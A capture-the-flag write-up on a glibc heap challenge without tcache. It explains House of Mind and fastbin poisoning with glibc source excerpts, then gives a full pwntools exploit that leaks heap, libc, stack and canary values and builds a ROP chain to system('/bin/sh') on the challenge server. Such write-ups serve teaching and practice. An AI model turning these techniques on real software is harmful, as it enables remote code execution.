House of Mind is an old attack that used non-main arena logic to write a freed chunk address at an arbitrary location in memory. This attack comes in 2 variants, unsorted and fastbin.
Non-main arena chunks are indicated in the size field by the 0x4 bit. The arena stores information about fastbins, unsorted bins and small/large bins, as well as other stuff like available memory in the heap and the address of top chunk. If a chunk is using the main arena, it will simply read from and write to the main arena, which is found in libc. However, if the chunk isn’t using main arena, it first resolves the address from another struct in the heap, which (for non-main arena heaps) should be placed at the very top of the heap.
From glibc source:
To find the arena for a chunk on such a non-main arena, heap_for_ptr performs a bit mask operation and indirection through the ar_ptr member of the per-heap header heap_info (see arena.c).
arena.c:
typedef struct _heap_info
{
  mstate ar_ptr;            /* Arena for this heap. */
  struct _heap_info *prev;  /* Previous heap. */
  size_t size;              /* Current size in bytes. */
  size_t mprotect_size;     /* Size in bytes that has been mprotected
                               PROT_READ|PROT_WRITE. */
  size_t pagesize;          /* Page size used when allocating the arena. */
  /* Make sure the following data is properly aligned, particularly
     that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
     MALLOC_ALIGNMENT. */
  char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
struct malloc_state
{
  /* Serialize access. */
  __libc_lock_define (, mutex);

  /* Flags (formerly in max_fast). */
  int flags;

  /* Set if the fastbin chunks contain recently inserted free blocks. */
  /* Note this is a bool but not all targets support atomics on booleans. */
  int have_fastchunks;

  /* Fastbins */
  mfastbinptr fastbinsY[NFASTBINS];

  /* Base of the topmost chunk -- not otherwise kept in a bin */
  mchunkptr top;

  /* The remainder from the most recent split of a small request */
  mchunkptr last_remainder;

  /* Normal bins packed as described above */
  mchunkptr bins[NBINS * 2 - 2];

  /* Bitmap of bins */
  unsigned int binmap[BINMAPSIZE];

  /* Linked list */
  struct malloc_state *next;

  /* Linked list for free arenas.  Access to this field is serialized
     by free_list_lock in arena.c. */
  struct malloc_state *next_free;

  /* Number of threads attached to this arena.  0 if the arena is on
     the free list.  Access to this field is serialized by
     free_list_lock in arena.c. */
  INTERNAL_SIZE_T attached_threads;

  /* Memory allocated from the system in this arena. */
  INTERNAL_SIZE_T system_mem;
  INTERNAL_SIZE_T max_system_mem;
};
libc-pointer-arith.h:
/* Align a value by rounding down to closest size.
   e.g. Using size of 4096, we get this behavior:
        {4095, 4096, 4097} = {0, 4096, 4096}. */
#define ALIGN_DOWN(base, size) ((base) & -((__typeof__ (base)) (size)))

/* Same as ALIGN_DOWN(), but automatically casts when base is a pointer. */
#define PTR_ALIGN_DOWN(base, size) \
  ((__typeof__ (base)) ALIGN_DOWN ((uintptr_t) (base), (size)))
malloc.c:
/* find the heap and corresponding arena for a given ptr */
static inline heap_info *
heap_for_ptr (void *ptr)
{
  size_t max_size = heap_max_size ();
  return PTR_ALIGN_DOWN (ptr, max_size);
}

static inline struct malloc_state *
arena_for_chunk (mchunkptr ptr)
{
  return chunk_main_arena (ptr) ? &main_arena : heap_for_ptr (ptr)->ar_ptr;
}

// ...__libc_free
{
  MAYBE_INIT_TCACHE ();

  /* Mark the chunk as belonging to the library again. */
  (void)tag_region (chunk2mem (p), memsize (p));

  ar_ptr = arena_for_chunk (p);
  _int_free (ar_ptr, p, 0);
}
So for non-main arena chunks, the address of the arena is resolved from heap_info, which is found using the PTR_ALIGN_DOWN macro. In other words: heap_info = chunk & ~(0x4000000 - 1). The arena pointer stored at this address is passed to _int_free, which then does stuff with it (e.g. writing to the fastbins in the arena). If we are able to control the pointer at this address, we can achieve our partial write.
And it’s not hard - we just need to create enough chunks so that the heap expands all the way past our desired address
of heap_info
and write the av
pointer to the location. Then when we create a chunk (fastbin), overwrite its size to
add the non_main_arena
flag, and then free that chunk, it will write the pointer to the arena address we control.
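A small sketch of the targeting math, following the formula above:

HEAP_MAX_SIZE = 0x4000000  # glibc default for 64-bit

def heap_for_ptr(ptr: int) -> int:
    # mirrors glibc's PTR_ALIGN_DOWN(ptr, heap_max_size())
    return ptr & ~(HEAP_MAX_SIZE - 1)

# spray allocations until the heap grows past heap_for_ptr(victim_chunk),
# plant a fake ar_ptr there, then free victim_chunk with NON_MAIN_ARENA set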
Small caveat - at around +0x880 from the start of our fake arena, there must be a sufficiently large value to serve as system_mem, or we fail this check:
if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
                      <= CHUNK_HDR_SZ, 0)
    || __builtin_expect (chunksize (chunk_at_offset (p, size))
                         >= av->system_mem, 0))
  {
    bool fail = true;
    /* We might not have a lock at this point and concurrent modifications
       of system_mem might result in a false positive.  Redo the test after
       getting the lock.  */
    if (!have_lock)
      {
        __libc_lock_lock (av->mutex);
        fail = (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ
                || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
        __libc_lock_unlock (av->mutex);
      }
    if (fail)
      malloc_printerr ("free(): invalid next size (fast)");
  }
This check makes our write a lot more restricted, considering a lot of memory in libc is null bytes. It rules out overwriting global_max_fast. After a while, I finally found that we can target _IO_2_1_stdin_: set its _chain field to our freed chunk, then fake a FILE according to House of Apple. This file should give us our shell when it's closed on exit!
Actually, I almost got this exploit to work perfectly - I was able to fake the file and trigger an exit (on debug version, it exits when it fails the assertion). It didn’t spawn my shell because the fake file needed a bit of tweaking to make some of the necessary pointers valid (it would crash while trying to close my file). However, when I tested on remote, I realized that the exploit takes way too long to setup House of Mind (sends on average 300 chunks) and the Docker jail will kill the process before House of Mind is finished. I’m too lazy to fix this exploit since it wouldn’t work on remote, and it’s not so trivial to exit on the actual challenge binary anyway (without the printing of the tree, the only other assert possible is quite difficult to fail).
After spending a few hours on this, it was almost midnight so I went to sleep.
The next day, I looked for other vectors to convert this almost-arbitrary fastbin write into RCE. After searching for a bit, I found a reliable stack leak in libc (libc_leak + 0x2046e0) that is always at a fixed offset from the saved RIP when create_mod is called. Additionally, the fastbin size check can easily be passed, since we can write a fake size just above the stack target when the program asks for the module code. We also need the value of the canary, which we can likewise read at a fixed offset from libc (it lives in TLS). The steps to leak these are similar to the libc leak, so I won't repeat them.
With the stack leak and canary, we can prepare to allocate a fastbin chunk on the stack. Using the double free we have, we write the address of the fake stack chunk into our poisoned fastbin chunk, plant the fake size, and then allocate our fake chunk, write our ROP chain, and win.
For the ROP chain, there's a small consideration: the chain overwrites the stack slot holding the address of the Tree, which would crash create_mod before it returns. To fix this, we put the address back into that slot and use a gadget that pops it into irrelevant registers, skipping over it and continuing our ROP chain, as sketched below.
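Annotated, that fixup in the final chain looks like this (the comments are my reading of each slot):

payload = flat(
    0x0, canary,        # pad up to the canary slot, keep the stack check happy
    0xdeadbeef,         # saved rbp (junk)
    pop_rsi_r15_rbp,    # gadget hops over the next three slots...
    0x100000000,        # -> rsi (irrelevant)
    heap_leak + 0x1910, # -> r15; this slot doubles as the Tree pointer, so refill it
    0x1,                # -> rbp (irrelevant)
    pop_rdi, next(libc.search(b"/bin/sh\x00")),
    ret,                # align the stack for system()
    libc.sym.system,
)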
#!/usr/bin/env python3
from pwn import *
exe = ELF("./main_patched")
libc = ELF("./lib/libc.so.6")
context.binary = exe
context.terminal = ["tmux", "splitw", "-hf"]
def fastbin_encrypt(pos: int, ptr: int):
    return (pos >> 12) ^ ptr

def fastbin_decrypt(val: int):
    mask = 0xfff << 52
    while mask:
        v = val & mask
        val ^= (v >> 12)
        mask >>= 12
    return val
if args.LOCAL:
    p = process([exe.path])
    if args.GDB:
        gdb.attach(p)
        pause()
else:
    p = remote("dojo.elmo.sg", 40501)
def add(code: bytes, size: int, data: bytes):
    p.sendlineafter(b"> ", b"1")
    p.sendlineafter(b"code:", code)
    p.sendlineafter(b"length:", str(size).encode())
    p.sendlineafter(b"description:", data)

def search(code: bytes):
    p.sendlineafter(b"> ", b"2")
    p.sendlineafter(b"code:", code)
    p.recvuntil(b"description:")
    p.recvline()
    return p.recvline()[:-1]

def delete(code: bytes):
    p.sendlineafter(b"> ", b"3")
    p.sendlineafter(b"code:", code)
# good luck pwning :)
# --- PART 1: leaks (heap, libc, stack, canary) ---
# set up the tree
for i in range(10):
    add(f"CS{i}001".encode(), 0x70, b"asdf")
add(b"CS2001", 0x70, b"asdf")
# fill up 0x80 tcache
for i in range(9, 2, -1):
    delete(f"CS{i}001".encode())
# uaf
delete(b"CS2001")
delete(b"CS0001")
delete(b"CS1001")
# get heap leak
heap_leak = u64(search(b"CS2001").ljust(8, b"\x00"))
heap_leak = fastbin_decrypt(heap_leak) - 0x3f0
print(hex(heap_leak))
pos1 = heap_leak + 0x980
target1 = heap_leak + 0x9d0
# double free
delete(b"CS2001")
# overwrite fastbin ptr
payload = p64(fastbin_encrypt(pos1, target1))
add(b"CS0001", 0x70, payload)
payload = flat(
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x81, # to fake a fastbin chunk here
fastbin_encrypt(heap_leak + 0x9e0, 0), 0x0,
)
# get 3 more to reach fake chunk
for i in range(3):
    add(f"CS100{i}".encode(), 0x70, payload)
payload = flat(
0x0, 0x0,
0x0, 0x31,
0xdeadbeef, 0x0,
0x0, 0xcafebabe,
0x0, 0x31,
0x1ffffde29, 0x0,
# *right, *data
heap_leak + 0xd00, heap_leak + 0xb20, # unsorted leak will be here later
)
add(b"CS2000", 0x70, payload)
# make new smallbin chunks and free them for unsorted leak
for i in range(8):
    add(f"CS999{i}".encode(), 0xf0, b"a")
for i in range(7, -1, -1):
    delete(f"CS999{i}".encode())
libc_leak = u64(search(b"\xff\xff1337").ljust(8, b"\x00")) - 0x203b20
print(hex(libc_leak))
stack_leak_pivot = libc_leak + 0x2046e0
print(hex(stack_leak_pivot))
# stuff that didn't work :(
# global_max_fast = libc_leak + 0x1d94a0
# fake_chunk = libc_leak + 0x1d2340
# exit_funcs = libc_leak + 0x1d42f0
# set up a new double free
target2 = heap_leak + 0x1d40
pos2 = heap_leak + 0x1b20
payload = flat(
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x71,
fastbin_encrypt(target2 + 0x10, 0), 0x0,
)
for i in range(10):
    add(f"CS500{i}".encode(), 0x60, payload)
for i in range(10, 20):
    add(f"CS50{i}".encode(), 0x60, payload)
# clear remnant of unsorted bin
add(b"CS0010", 0x10, b"a")
# # fill tcache
delete(b"CS5019")
delete(b"CS5017")
delete(b"CS5009")
delete(b"CS5007")
delete(b"CS5005")
delete(b"CS5003")
delete(b"CS5001")
# double free in 0x70
delete(b"CS5012")
delete(b"CS5011")
delete(b"CS5013")
payload = p64(fastbin_encrypt(pos2, target2))
add(b"CS6000", 0x60, payload)
for i in range(2):
    add(f"CS600{i}".encode(), 0x60, b"a")
payload = flat(
0x0, 0x0,
0x0, 0x31,
0x40cb47cc8, heap_leak + 0x19b0,
heap_leak + 0x1af0, stack_leak_pivot,
)
add(b"CS9996", 0x60, payload)
stack_leak = u64(search(b"CS5016").ljust(8, b"\x00")) - 0x140 # ret addr
print(hex(stack_leak))
canary_addr = libc_leak - 0x2898
# double free
target3 = heap_leak + 0x25b0
pos3 = heap_leak + 0x24d0
payload = flat(
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x71,
fastbin_encrypt(target3 + 0x10, 0), 0x0,
)
for i in range(10):
    add(f"CS700{i}".encode(), 0x60, payload)
for i in range(10, 20):
    add(f"CS70{i}".encode(), 0x60, payload)
# fill tcache
delete(b"CS7018")
delete(b"CS7002")
delete(b"CS7000")
delete(b"CS7019")
delete(b"CS7016")
delete(b"CS7014")
delete(b"CS7012")
delete(b"CS7009")
delete(b"CS7008")
delete(b"CS7010")
payload = p64(fastbin_encrypt(pos3, target3))
add(b"CS7999", 0x60, payload)
for i in range(2):
    add(f"CS790{i}".encode(), 0x60, b"a")
payload = flat(
0x0, 0x0,
0x0, 0x31,
0x50cb48493, heap_leak + 0x1f50,
heap_leak + 0x29a0, canary_addr+1,
)
add(b"CS7902", 0x60, payload)
print(hex(target3))
canary = u64(search(b"CS7011")[:7].rjust(8, b"\x00"))
print(hex(canary))
# -- PART 2: write rop chain ---
target4 = stack_leak - 0x28
pos4 = heap_leak + 0x2dd0
payload = flat(
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x71,
fastbin_encrypt(target4 + 0x10, 0), 0x0,
)
for i in range(10):
    add(f"CS800{i}".encode(), 0x60, payload)
for i in range(10, 20):
    add(f"CS80{i}".encode(), 0x60, payload)
delete(b"CS8005")
delete(b"CS8004")
delete(b"CS8006")
payload = p64(fastbin_encrypt(pos4, target4))
add(b"CS8999", 0x60, payload)
for i in range(2):
    add(f"CS890{i}".encode(), 0x60, b"a")
code = b"CS1234\x00\x00"
code += p64(0x71)
code = code[:-1]
print(code)
libc.address = libc_leak
pop_rsi_r15_rbp = libc_leak + 0x2a871
pop_rdi = libc_leak + 0x10f75b
ret = libc_leak + 0x2882f
payload = flat(
0x0, canary,
0xdeadbeef,
pop_rsi_r15_rbp, 0x100000000, heap_leak + 0x1910, 0x1,
pop_rdi, next(libc.search(b"/bin/sh\x00")),
ret, libc.sym.system
)
add(code, 0x60, payload)
p.interactive() # grey{m4573r_0f_7r335_4nd_h34p}
This challenge was a lot of fun because of how different not having tcache made things (despite having a really simple vuln). I still don’t know how AVL trees work tho…
I also solved IP Cam and Malware together with scuffed (actually they did most of the reversing, I just helped a little with the libc and decrypting the flag). I'm too lazy to write writeups for them (especially IP Cam, since I don't have access to the camera anymore), but still cool challs nonetheless!